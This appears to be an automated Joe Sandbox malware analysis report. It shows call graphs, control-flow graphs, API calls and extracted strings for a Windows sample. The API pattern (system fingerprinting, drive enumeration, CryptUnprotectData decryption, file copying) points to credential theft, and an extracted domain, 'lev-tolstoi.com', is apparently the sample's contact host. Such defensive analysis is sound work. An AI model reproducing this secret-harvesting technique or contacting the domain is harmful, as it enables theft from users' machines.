8656->8661 8657 425521 8662 43f640 2 API calls 8657->8662 8658 43f960 2 API calls 8658->8660 8659 42532e 8659->8606 8660->8656 8660->8657 8660->8658 8660->8659 8661->8659 8663 425552 8662->8663 8664 43f4f0 LdrInitializeThunk 8663->8664 8666 425586 8663->8666 8664->8666 8665 43f4f0 LdrInitializeThunk 8665->8666 8666->8665 8666->8666 8667 426190 8666->8667 8671 42633d 8666->8671 8736 43c7a0 LdrInitializeThunk 8667->8736 8669 42660f 8669->8606 8670 42676e 8735 43c7a0 LdrInitializeThunk 8670->8735 8671->8669 8671->8670 8734 43c7a0 LdrInitializeThunk 8671->8734 8675 4275e0 8674->8675 8678 42761e 8675->8678 8737 43c7a0 LdrInitializeThunk 8675->8737 8676 40e630 8682 4278a0 8676->8682 8678->8676 8681 4276de 8678->8681 8738 43c7a0 LdrInitializeThunk 8678->8738 8679 43ab10 RtlFreeHeap 8679->8676 8681->8679 8689 4278a9 8682->8689 8683 42837e 8685 43ec70 LdrInitializeThunk 8683->8685 8690 42838e 8685->8690 8686 428370 CopyFileW 8686->8683 8687 43f130 LdrInitializeThunk 8687->8690 8689->8683 8689->8686 8689->8690 8691 4278b4 8689->8691 8690->8687 8690->8690 8690->8691 8739 43f030 8690->8739 8743 43c7a0 LdrInitializeThunk 8690->8743 8691->8610 8701 42a360 8692->8701 8693 43ec70 LdrInitializeThunk 8693->8701 8694 43f030 LdrInitializeThunk 8694->8701 8695 42a444 8695->8612 8697 42a4e6 8698 42a54e 8697->8698 8745 43c7a0 LdrInitializeThunk 8697->8745 8699 43f130 LdrInitializeThunk 8699->8701 8700 42ac46 8701->8693 8701->8694 8701->8695 8701->8697 8701->8699 8703 420dd0 8702->8703 8703->8703 8704 422ba0 2 API calls 8703->8704 8705 420e19 8704->8705 8705->8640 8707 43f980 8706->8707 8707->8707 8710 43f9fe 8707->8710 8729 43c7a0 LdrInitializeThunk 8707->8729 8708 43fd72 8708->8637 8710->8708 8713 43fb8e 8710->8713 8730 43c7a0 LdrInitializeThunk 8710->8730 8711 43ab10 RtlFreeHeap 8711->8708 8713->8711 8715 43f660 8714->8715 8718 43f6de 8715->8718 8731 43c7a0 LdrInitializeThunk 8715->8731 8717 43ab10 RtlFreeHeap 8720 425552 8717->8720 8718->8720 8721 43f7fe 8718->8721 8732 43c7a0 LdrInitializeThunk 8718->8732 8720->8645 8722 43f4f0 8720->8722 8721->8717 8724 43f510 8722->8724 8723 43f5fe 8723->8645 8724->8723 8733 43c7a0 LdrInitializeThunk 8724->8733 8726->8650 8727->8646 8728->8640 8729->8710 8730->8713 8731->8718 8732->8721 8733->8723 8734->8670 8735->8667 8736->8659 8737->8678 8738->8681 8741 43f050 8739->8741 8740 43f0de 8740->8690 8741->8740 8744 43c7a0 LdrInitializeThunk 8741->8744 8743->8690 8744->8740 8745->8700 8746 417fb0 8749 418000 8746->8749 8747 418058 8748 43ee50 LdrInitializeThunk 8748->8749 8749->8747 8749->8748 8902 40a93f 8907 40ac40 8902->8907 8905 40ac40 RtlFreeHeap 8906 40a94e 8905->8906 8910 40ac70 8907->8910 8908 40a945 8908->8905 8909 43ab10 RtlFreeHeap 8909->8908 8910->8908 8910->8909 8910->8910

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 0 437dd0-437df8 1 437e00-437e26 0->1 1->1 2 437e28-437e39 1->2 3 437e40-437e7e 2->3 3->3 4 437e80-437ec9 3->4 5 437ed0-437f0e 4->5 5->5 6 437f10-437f32 5->6 8 437f38-437f43 6->8 9 437fdd-437fe8 6->9 10 437f50-437fba 8->10 11 437ff0-438028 9->11 10->10 13 437fbc-437fd6 10->13 11->11 12 43802a-438084 CoCreateInstance 11->12 14 438563-43858c call 43e480 GetVolumeInformationW 12->14 15 43808a-4380bf 12->15 13->9 20 438596-438598 14->20 21 43858e-438592 14->21 16 4380c0-4380e1 15->16 16->16 18 4380e3-43810d SysAllocString 16->18 26 438553-43855f SysFreeString 18->26 27 438113-43812d CoSetProxyBlanket 18->27 23 4385ad-4385b4 20->23 21->20 24 4385c0-4385d6 23->24 25 4385b6-4385bd 23->25 28 4385e0-43860c 24->28 25->24 26->14 29 438133-438145 27->29 30 438549-43854f 27->30 28->28 31 43860e-43863e 28->31 32 438150-43817e 29->32 30->26 33 438640-438672 31->33 32->32 34 438180-4381f8 SysAllocString 32->34 33->33 35 438674-43869d call 41fa90 33->35 36 438200-438214 34->36 40 4386a0-4386a8 35->40 36->36 38 438216-438243 SysAllocString 36->38 43 438533-438545 SysFreeString * 2 38->43 44 438249-43826b 38->44 40->40 42 4386aa-4386ac 40->42 45 4386b2-4386c2 call 408050 42->45 46 4385a0-4385a7 42->46 43->30 50 438271-438274 44->50 51 438529-43852f 44->51 45->46 46->23 47 4386c7-4386ce 46->47 50->51 53 43827a-43827f 50->53 51->43 53->51 54 438285-4382cb VariantInit 53->54 55 4382d0-4382f3 54->55 55->55 56 4382f5-438303 55->56 57 438307-438310 56->57 58 438316-43831c 57->58 59 438518-438525 VariantClear 57->59 58->59 60 438322-43832c 58->60 59->51 61 43832e-438335 60->61 62 43836d-43836f 60->62 64 43834c-438350 61->64 63 438371-43838b call 407fa0 62->63 73 4384c3-4384d4 63->73 74 438391-43839d 63->74 66 438352-43835b 64->66 67 438340 64->67 70 438362-438366 66->70 71 43835d-438360 66->71 69 438341-43834a 67->69 69->63 69->64 70->69 72 438368-43836b 70->72 71->69 72->69 76 4384d6 73->76 77 4384db-4384ea 73->77 74->73 75 4383a3-4383ab 74->75 78 4383b0-4383ba 75->78 76->77 79 4384f1-438514 call 407fd0 call 407fb0 77->79 80 4384ec 77->80 81 4383d0-4383d6 78->81 82 4383bc-4383c1 78->82 79->59 80->79 85 4383f4-438404 81->85 86 4383d8-4383db 81->86 84 438460-438464 82->84 88 438466-43846e 84->88 90 438406-438409 85->90 91 43847a-438482 85->91 86->85 89 4383dd-4383f2 86->89 88->73 94 438470-438472 88->94 89->84 90->91 96 43840b-43845f 90->96 91->88 95 438484-438487 91->95 94->78 97 438478 94->97 98 438489-4384bd 95->98 99 4384bf-4384c1 95->99 96->84 97->73 98->84 99->84
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CoCreateInstance.OLE32(0044268C,00000000,00000001,0044267C), ref: 0043807C
                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(B9F7B704), ref: 004380E8
                                                                                                                                                                                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438125
                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(47174513), ref: 00438185
                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(B5F1B3C1), ref: 0043821F
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(XQRS), ref: 0043828A
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(XQRS), ref: 00438519
                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0043853D
                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00438543
                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00438554
                                                                                                                                                                                                                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00438588
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                                                                                                                                                              • String ID: :$Hwt$MXE$WHIJ$XQRS$\`D$`;M$D_X
                                                                                                                                                                                                                                              • API String ID: 2573436264-2768600242
                                                                                                                                                                                                                                              • Opcode ID: 9fd90adbbd83c18043c5aa7b7f992eed34e85813c72d797529d7f06a4ed84b05
                                                                                                                                                                                                                                              • Instruction ID: 5f7ee7c7399156ef7b7e299cb0dbb6b514117c90105b6ce6de4eacd2dcfad572
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9fd90adbbd83c18043c5aa7b7f992eed34e85813c72d797529d7f06a4ed84b05
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2732EF72A083509BD310CF25C88179BFBE5EF99314F18892EF595DB380E679D9058B86

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 100 40e7e4-40e80f call 409710 CoUninitialize 103 40e810-40e824 100->103 103->103 104 40e826-40e83f 103->104 105 40e840-40e85a 104->105 105->105 106 40e85c-40e8b9 105->106 107 40e8c0-40e8da 106->107 107->107 108 40e8dc-40e8ed 107->108 109 40e90b-40e913 108->109 110 40e8ef-40e8f6 108->110 112 40e915-40e916 109->112 113 40e92b-40e935 109->113 111 40e900-40e909 110->111 111->109 111->111 114 40e920-40e929 112->114 115 40e937-40e93b 113->115 116 40e94b-40e953 113->116 114->113 114->114 117 40e940-40e949 115->117 118 40e955-40e956 116->118 119 40e96b-40e975 116->119 117->116 117->117 120 40e960-40e969 118->120 121 40e977-40e97b 119->121 122 40e98b-40e997 119->122 120->119 120->120 123 40e980-40e989 121->123 124 40e9b1-40ead1 122->124 125 40e999-40e99b 122->125 123->122 123->123 127 40eae0-40eb21 124->127 126 40e9a0-40e9ad 125->126 126->126 128 40e9af 126->128 127->127 129 40eb23-40eb44 127->129 128->124 130 40eb50-40eb7a 129->130 130->130 131 40eb7c-40ebdf call 40bb90 call 409710 CoUninitialize 130->131 136 40ebe0-40ebf4 131->136 136->136 137 40ebf6-40ec0b 136->137 138 40ec10-40ec2a 137->138 138->138 139 40ec2c-40ec89 138->139 140 40ec90-40ecaa 139->140 140->140 141 40ecac-40ecbd 140->141 142 40ecdb-40ece3 141->142 143 40ecbf-40ecc6 141->143 145 40ed00 142->145 146 40ece5-40ecea 142->146 144 40ecd0-40ecd9 143->144 144->142 144->144 148 40ed04-40ed12 145->148 147 40ecf0-40ecf9 146->147 147->147 149 40ecfb 147->149 150 40ed14 148->150 151 40ed2b-40ed36 148->151 149->148 152 40ed20-40ed29 150->152 153 40ed38-40ed39 151->153 154 40ed4b-40ed55 151->154 152->151 152->152 155 40ed40-40ed49 153->155 156 40ed57 154->156 157 40ed6b-40ed77 154->157 155->154 155->155 158 40ed60-40ed69 156->158 159 40ed91-40eec3 157->159 160 40ed79-40ed7b 157->160 158->157 158->158 162 40eed0-40ef10 159->162 161 40ed80-40ed8d 160->161 161->161 163 40ed8f 161->163 162->162 164 40ef12-40ef3f 162->164 163->159 165 40ef40-40ef69 164->165 165->165 166 40ef6b-40ef8c call 40bb90 165->166 168 40ef91-40efa7 166->168
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Uninitialize
                                                                                                                                                                                                                                              • String ID: =;'$E$LW@G$TQRn$XYOq$XYOq$Z[K_$l$lev-tolstoi.com$nv$tr$|\7y$|\7y
                                                                                                                                                                                                                                              • API String ID: 3861434553-2326245944
                                                                                                                                                                                                                                              • Opcode ID: f0af35338d8a968c5eaa140309c8f0cddc258756cce5a68323755f63809a90dc
                                                                                                                                                                                                                                              • Instruction ID: c53147e7ceb87a1525af61496e46eed0648db5acb92f28f93d7ff45d9e5b06c9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f0af35338d8a968c5eaa140309c8f0cddc258756cce5a68323755f63809a90dc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED028CB150D3C18BD3328F2684A07EBBBE0AF97314F184D6DD5D96B392D63A0805CB5A

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 169 4278a0-4278a4 call 4278c0 171 4278a9-4278ae 169->171 172 427fe0-42802b 171->172 173 4278b4-4278b6 171->173 174 428030-42804c 172->174 174->174 175 42804e-428124 174->175 176 428130-42816e 175->176 176->176 177 428170-428193 call 438dc0 176->177 180 428486-4284d3 177->180 181 428567-428575 177->181 182 4282c9-4282d6 177->182 183 428429-42847f call 407fa0 call 42ac60 177->183 184 42852e 177->184 185 4282ac-4282c2 call 407fb0 177->185 186 4283cc-4283ed call 43f030 177->186 187 4281b1-4281b3 177->187 188 4283f4-428422 call 407fa0 call 43f130 177->188 189 428554 177->189 190 42819a-4281a8 177->190 191 42837e-428396 call 43ec70 177->191 192 4282dd-428348 177->192 193 42839d-42839f 177->193 201 4284e0-42850c 180->201 194 428580-428592 181->194 182->180 182->181 182->183 182->184 182->186 182->188 182->189 182->191 182->192 182->193 183->180 183->181 183->184 183->189 212 428538-42854c call 42afd0 call 407fb0 183->212 215 42855c-428564 call 407fb0 183->215 216 4283a7-4283be call 407fb0 183->216 219 428745-428759 183->219 220 4283c5-4291c1 183->220 221 42878d-4287a4 183->221 222 4285ed-428676 183->222 223 42871a 183->223 224 4285db-4285e6 183->224 184->212 185->180 185->181 185->182 185->183 185->184 185->186 185->188 185->189 185->191 185->192 185->193 186->180 186->181 186->183 186->184 186->188 186->189 186->212 186->215 186->216 186->219 186->220 186->221 186->222 186->223 186->224 198 4291f3-4291ff 187->198 188->180 188->181 188->183 188->184 188->189 188->212 188->215 188->216 188->219 188->220 188->221 188->222 188->223 188->224 189->215 196 4281aa-4281af 190->196 197 4281b8 190->197 191->180 191->181 191->183 191->184 191->186 191->188 191->189 191->193 191->219 203 428350-42836e 192->203 193->216 194->194 205 428594-42859c 194->205 207 4281bf-428228 call 407fa0 196->207 197->207 201->201 210 42850e-428527 call 42ae50 201->210 203->203 213 428370-42837a CopyFileW 203->213 217 42859e-4285aa 205->217 218 4285cc-4285ce 205->218 247 428230-428244 207->247 210->181 210->184 210->189 210->212 210->215 210->216 210->219 210->220 210->221 210->222 210->223 210->224 212->189 213->191 215->181 216->220 216->222 216->223 235 4285b0-4285b7 217->235 218->224 219->181 219->184 219->189 219->212 219->215 219->216 219->220 219->221 219->222 219->223 219->224 242 428760-428786 219->242 220->198 249 4291c3-4291c5 220->249 243 4287a6-4287aa 221->243 244 4287af-4287d2 221->244 238 428680-428694 222->238 250 428724-428738 call 43c7a0 223->250 224->220 224->222 224->223 245 4285c0-4285c6 235->245 246 4285b9-4285bc 235->246 238->238 248 428696-4286db 238->248 242->181 242->184 242->189 242->212 242->215 242->216 242->220 242->221 242->222 242->223 242->224 252 42884a-428866 243->252 253 4287d6-4287fd call 407fa0 244->253 254 4287d4 244->254 245->218 245->250 246->235 256 4285be 246->256 247->247 257 428246-428250 247->257 275 4286e0-428706 248->275 249->198 259 4291c7-4291cb 249->259 250->219 258 428870-428878 252->258 269 42883b-428846 253->269 270 4287ff-428805 253->270 254->253 256->218 263 428252-42825b 257->263 264 428271-42827e 257->264 258->258 265 42887a-4288be call 407fa0 258->265 267 4291d7-4291db 259->267 271 428260-42826f 263->271 273 428280-428284 264->273 274 4282a1 264->274 287 4288c0-4288d1 265->287 288 4288d7-4288e5 265->288 276 4291d0-4291d5 267->276 277 4291dd-4291e6 call 407fb0 267->277 269->252 278 428832-428838 call 407fb0 270->278 279 428807-428809 270->279 271->264 271->271 281 428290-42829f 273->281 274->185 275->275 282 428708-428713 275->282 276->267 283 4291e8-4291f1 call 407fb0 276->283 277->276 278->269 285 428810-428830 279->285 281->274 281->281 282->180 282->181 282->183 282->184 282->186 282->188 282->189 282->193 282->212 282->215 282->216 282->219 282->220 282->221 282->222 282->223 282->224 283->198 285->278 285->285 287->242 287->288 292 4288f0-4289cf 288->292 292->292 294 4289d5-4289da 292->294
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: %&$'b7d$+z>|$0Z7\$2f&x$67$>n0`$L[$Y
                                                                                                                                                                                                                                              • API String ID: 0-222560991
                                                                                                                                                                                                                                              • Opcode ID: 6601ab9ab9b644408d8ccec013c20ab3cbc7244c84165e51234428316aa982db
                                                                                                                                                                                                                                              • Instruction ID: 1eba43183b78657d2ec025f33ba4bd6dbd30055c41ba690c7bee636d554fb25b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6601ab9ab9b644408d8ccec013c20ab3cbc7244c84165e51234428316aa982db
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C04224B5A083518FC3248F28E85136FB7E1EBC5314F498A3DE9D59B391DB789805CB86

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 302 41a273-41a65f call 407fb0 306 41a660-41a6ae 302->306 306->306 307 41a6b0-41a6b8 306->307 308 41a7ab-41a80f call 401a60 307->308 309 41a6be-41a6cf 307->309 316 41a810-41a834 308->316 311 41a6d0-41a6d7 309->311 313 41a78a-41a790 311->313 314 41a6dd-41a6e0 311->314 313->308 315 41a792-41a7a8 call 43c7a0 313->315 314->311 317 41a6e2 314->317 315->308 316->316 319 41a836-41a859 call 401da0 316->319 317->308 323 41a980-41a9e5 319->323 324 41a860-41a864 319->324 325 41a964-41a967 319->325 326 41ab54-41ab5f 319->326 329 41a9f0-41aa15 323->329 328 41a870-41a876 324->328 332 41a974-41a97d call 407fb0 325->332 327 41ab60-41ab69 326->327 327->327 331 41ab6b-41ab6e 327->331 328->328 333 41a878-41a8b7 328->333 329->329 330 41aa17-41aa32 call 401da0 329->330 330->323 330->332 346 41aa53-41aa5a 330->346 335 41ab70-41ab75 331->335 336 41ab77 331->336 332->323 338 41a8b9-41a8bc 333->338 339 41a8be 333->339 342 41ab7a-41abbb call 407fa0 335->342 336->342 338->339 340 41a8bf-41a8cf 338->340 339->340 344 41a8d1-41a8d4 340->344 345 41a8d6 340->345 353 41abc0-41abf0 342->353 344->345 348 41a8d7-41a8ef call 407fa0 344->348 345->348 349 41aa74-41aac7 call 41ef80 * 2 346->349 348->346 357 41a8f5-41a95d call 43e480 CryptUnprotectData 348->357 369 41aa60-41aa6e 349->369 370 41aac9-41aae0 call 41ef80 349->370 353->353 356 41abf2-41abfa 353->356 359 41ac21-41ac31 356->359 360 41abfc-41ac01 356->360 357->325 357->326 373 41ac72 357->373 364 41ac53 359->364 365 41ac33-41ac3f 359->365 363 41ac10-41ac1f 360->363 363->359 363->363 367 41ac56-41ac6c call 408bf0 364->367 366 41ac40-41ac4f 365->366 366->366 371 41ac51 366->371 367->373 369->349 369->357 370->369 377 41aae6-41ab0f 370->377 371->367 373->373 377->369 378 41ab15-41ab2f call 41ef80 377->378 378->369 381 41ab35-41ab4f 378->381 381->369
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 3.A<$EYSh$L@v|$P[_D$U@It$`jda$vsMM
                                                                                                                                                                                                                                              • API String ID: 0-2446076125
                                                                                                                                                                                                                                              • Opcode ID: 2a14b742d65583bfda0f78b44a885def0ba80dec5df2ee51d36828b82c1c7075
                                                                                                                                                                                                                                              • Instruction ID: 8c585a461151c81bba74b8734b5cb7031e895881b1a011cc9bba6ab4444b49a5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a14b742d65583bfda0f78b44a885def0ba80dec5df2ee51d36828b82c1c7075
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AAD106B1A093418BD724CF24C8917AFB7E1EBC5314F19892EE49997391E738DC428B4B

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 382 424950-4249d5 383 4249e0-4249fa 382->383 383->383 384 4249fc-424a3f 383->384 386 424a40-424a80 384->386 386->386 387 424a82-424a89 386->387 388 424a90-424a97 387->388 389 424aa0 387->389 390 424af0 387->390 391 424ae6-424aef 387->391 392 424e04-424e0e 387->392 393 424ad5 387->393 394 424d05-424d14 387->394 395 424b0a-424ba8 387->395 396 424df8-424dfd 387->396 397 424af9-424b01 387->397 398 424c1f-424c62 call 407fa0 387->398 399 424add-424ae3 call 407fb0 387->399 400 424aa8 388->400 401 424a99-424a9e 388->401 389->400 390->397 405 424e10-424e15 392->405 406 424e17 392->406 393->399 403 424d16 394->403 404 424d1b-424d56 call 407fa0 394->404 402 424bb0-424bfe 395->402 396->392 396->395 396->397 397->395 419 424c70-424c98 398->419 399->391 413 424aab-424ace call 407fa0 400->413 401->413 402->402 410 424c00-424c0c call 422ba0 402->410 403->404 424 424d60-424d87 404->424 411 424e1e-424eb2 call 407fa0 405->411 406->411 420 424c11-424c16 410->420 425 424ec0-424ed2 411->425 413->390 413->391 413->392 413->393 413->394 413->395 413->396 413->397 413->398 413->399 419->419 422 424c9a-424ca2 419->422 420->398 426 424cc1-424ccc 422->426 427 424ca4-424ca9 422->427 424->424 428 424d89-424d94 424->428 425->425 431 424ed4-424edc 425->431 433 424cf1-424d02 call 43ee50 426->433 434 424cce-424cd1 426->434 432 424cb0-424cbf 427->432 429 424db1-424dbf 428->429 430 424d96-424d9b 428->430 439 424de1-424dea call 43ee50 429->439 440 424dc1-424dc4 429->440 436 424da0-424daf 430->436 437 424f01-424f0f 431->437 438 424ede-424ee5 431->438 432->426 432->432 433->394 441 424ce0-424cef 434->441 436->429 436->436 446 424f31-424f50 GetLogicalDrives call 43ee50 437->446 447 424f11-424f14 437->447 445 424ef0-424eff 438->445 450 424def 439->450 443 424dd0-424ddf 440->443 441->433 441->441 443->439 443->443 445->437 445->445 453 4250b6 446->453 454 424f67 446->454 455 424f57-424f5f 446->455 456 424f84-424fa8 446->456 457 424f7e 446->457 458 4250bc-4250c4 call 407fb0 446->458 459 424f6d-424f75 call 407fb0 446->459 449 424f20-424f2f 447->449 449->446 449->449 450->396 453->458 454->459 455->454 460 424fb0-424fcf 456->460 457->456 459->457 460->460 465 424fd1-425047 460->465 466 425050-42508e 465->466 466->466 467 425090-4250ad call 422a20 466->467 467->453
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: t$h~$k$p|$s
                                                                                                                                                                                                                                              • API String ID: 0-4107611172
                                                                                                                                                                                                                                              • Opcode ID: 5c6bf36c0375983148688f16e7e4052c03093512addb715ea89e273d52cfd3b8
                                                                                                                                                                                                                                              • Instruction ID: 46ff63fa0f42428502a4572981796c4815eaac668413a0dd1d4e32a1ac5cc054
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c6bf36c0375983148688f16e7e4052c03093512addb715ea89e273d52cfd3b8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C91276B4A00316CFDB00CFA8D8816AABBB1FF46314F5582ADD9456F391D3799842CF95

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 470 42cb9f-42cbfb call 43e480 474 42cc00-42cc1f 470->474 474->474 475 42cc21-42cc2e 474->475 476 42cc30-42cc37 475->476 477 42cc4b-42cc58 475->477 478 42cc40-42cc49 476->478 479 42cc5a-42cc61 477->479 480 42cc7b-42ccf1 FreeLibrary call 43e480 GetComputerNameExA 477->480 478->477 478->478 481 42cc70-42cc79 479->481 484 42cd00-42cd80 480->484 481->480 481->481 484->484 485 42cd86-42cd9f 484->485 487 42cda0-42cda9 485->487 487->487 488 42cdab-42cdc1 487->488 490 42cdc3-42cdca 488->490 491 42cddb-42ce2f GetComputerNameExA 488->491 493 42cdd0-42cdd9 490->493 492 42ce30-42ce6d 491->492 492->492 494 42ce6f-42ce79 492->494 493->491 493->493 495 42ce9b-42cea8 494->495 496 42ce7b-42ce82 494->496 498 42ceaa-42ceb1 495->498 499 42cecb-42cf1a 495->499 497 42ce90-42ce99 496->497 497->495 497->497 500 42cec0-42cec9 498->500 502 42cf20-42cf3a 499->502 500->499 500->500 502->502 503 42cf3c-42cf46 502->503 504 42cf5b-42cf68 503->504 505 42cf48-42cf4f 503->505 507 42cf6a-42cf71 504->507 508 42cf8b-42cfe7 call 43e480 504->508 506 42cf50-42cf59 505->506 506->504 506->506 509 42cf80-42cf89 507->509 513 42cff0-42d075 508->513 509->508 509->509 513->513 514 42d07b-42d091 513->514 516 42d0a0-42d0a9 514->516 516->516 517 42d0ab-42d0f7 call 408dc0 516->517 521 42d100-42d13f 517->521 521->521 522 42d141-42d14d 521->522 523 42d16b-42d16e call 430ec0 522->523 524 42d14f-42d156 522->524 527 42d173-42d1a0 523->527 525 42d160-42d169 524->525 525->523 525->525
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0042CC88
                                                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042CCC4
                                                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042CDFD
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ComputerName$FreeLibrary
                                                                                                                                                                                                                                              • String ID: 7SO|$Y:
                                                                                                                                                                                                                                              • API String ID: 2243422189-331956180
                                                                                                                                                                                                                                              • Opcode ID: c04b4799174f8eb22ea3c1c90751e6bd9b4b6783ebfa62ded5f4eaf2dd07ba73
                                                                                                                                                                                                                                              • Instruction ID: 3b35ccf2beb8d06d415e8115d5231f64daf1752e1a9548f943f7687b18b0c208
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c04b4799174f8eb22ea3c1c90751e6bd9b4b6783ebfa62ded5f4eaf2dd07ba73
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54E101716083D08ED735CB25D8507ABBBD29FE7304F5888AED0C99B282DA794506CB67

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
